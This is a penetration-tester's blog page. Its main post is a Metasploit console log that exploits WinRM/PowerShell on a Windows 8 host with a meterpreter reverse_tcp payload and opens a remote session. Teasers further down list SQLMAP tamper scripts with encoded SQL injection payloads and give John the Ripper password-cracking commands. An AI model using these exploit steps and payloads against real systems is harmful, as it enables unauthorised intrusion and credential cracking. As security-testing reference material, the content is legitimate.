Skip to main content

Windows 8 Vulnerability

Window 8 "winrm_powershell" vulnerability 

I really can't wait for this new vulnerability for windows 8 possibly a critical issue for the Microsoft to fix this. Currently Metasploit exploit are still not available yet for me to test it. Hopefully it will arrive soon for me to test it!

  1. msf  exploit(winrm_powershell) > show options
  2. Module options (exploit/windows/winrm/winrm_powershell):
  3.    Name      Current Setting  Required  Description
  4.    ----      ---------------  --------  -----------
  5.    DOMAIN    WORKSTATION      yes       The domain to use for Windows authentification
  6.    PASSWORD  omfg             no        A specific password to authenticate with
  7.    Proxies                    no        Use a proxy chain
  8.    RHOST     10.6.255.158     yes       The target address
  9.    RPORT     5985             yes       The target port
  10.    URI       /wsman           yes       The URI of the WinRM service
  11.    USERNAME  sinn3r           no        A specific username to authenticate as
  12.    VHOST                      no        HTTP server virtual host
  13. Payload options (windows/meterpreter/reverse_tcp):
  14.    Name      Current Setting  Required  Description
  15.    ----      ---------------  --------  -----------
  16.    EXITFUNC  thread           yes       Exit technique: seh, thread, process, none
  17.    LHOST     10.6.255.84      yes       The listen address
  18.    LPORT     4444             yes       The listen port
  19. Exploit target:
  20.    Id  Name
  21.    --  ----
  22.    0   Automatic
  23. msf  exploit(winrm_powershell) > rexploit
  24. [*] Reloading module...
  25. [*] Started reverse handler on 10.6.255.84:4444
  26. [*] Attempting to set Execution Policy
  27. [*] Grabbing %TEMP%
  28. [*] uploading powershell script to C:\Users\sinn3r\AppData\Local\Temp\uUIpRDrz.ps1
  29. [*] Attempting to execute script...
  30. [*] Sending stage (752128 bytes) to 10.6.255.158
  31. [*] Meterpreter session 1 opened (10.6.255.84:4444 -> 10.6.255.158:49535) at 2012-10-31 17:09:00 -0500
  32. meterpreter >
  33. [*] Session ID 1 (10.6.255.84:4444 -> 10.6.255.158:49535) processing InitialAutoRunScript 'post/windows/manage/smart_migrate'
  34. [*] Current server process: powershell.exe (2844)
  35. [+] Migrating to 696
  36. [+] Successfully migrated to process
  37. meterpreter > sysinfo
  38. Computer        : WIN-VFQHRRTCA39
  39. OS              : Windows 8 (Build 9200).
  40. Architecture    : x86
  41. System Language : en_US
  42. Meterpreter     : x86/win32
  43. meterpreter >

Comments

Popular posts from this blog

List of SQLMAP Tamper Scripts

Just re-post one of my visited reference blog post: Original URL: http://www.forkbombers.com/2016/07/sqlmap-tamper-scripts-update.html Name Description Example apostrophemask.py Replaces apostrophe character with its UTF-8 full width counterpart '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871' apostrophenullencode.py Replaces apostrophe character with its illegal double unicode counterpart '1 AND %271%27=%271' appendnullbyte.py Appends encoded NULL byte character at the end of payload '1 AND 1=1' base64encode.py Base64 all characters in a given payload 'MScgQU5EIFNMRUVQKDUpIw==' between.py Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' '1 AND A NOT BETWEEN 0 AND B--' bluecoat.py Replaces space character after SQL statement with a valid random blank character.Afterwards replace character = with LIKE operator 'SELECT%09id FROM users where id LIKE 1' chardoubleencode.py Double url-encodes all character

Create a session & restore abort/interrupted session in John The Ripper!

Been busy with report writing. Just wanna put some of these command and technique on how to restore interrupted session or aborted session in John The Ripper. 1. First step crack the hash with these commands : john --session=test --format=raw-sha --incremental=rockyou test.txt 2. To restore the abort /interrupted session that you wanted to resume just run these commands : john --restore=test Check the "test.log" Note:  Make sure that these file are not delete " .rec " and " .log " files if the file is deleted or missing it wont work. That's all happy cracking!

iOS - Convert .app to .ipa

While doing a iOS Security Testing, I wondered how do we convert .app into .ipa. So basically here are the structure of .ipa files. 1. First, SSH in your iPhone (Jailbroken). 2. Download the .app folder via scp  3. Copy the .app folder into a folder called Payload. 4. Compress it with .zip extension using any compression software. 5. Change the extension from file.zip to file.ipa. That’s it. Now you can use these .ipa files to install the app into your iPhone.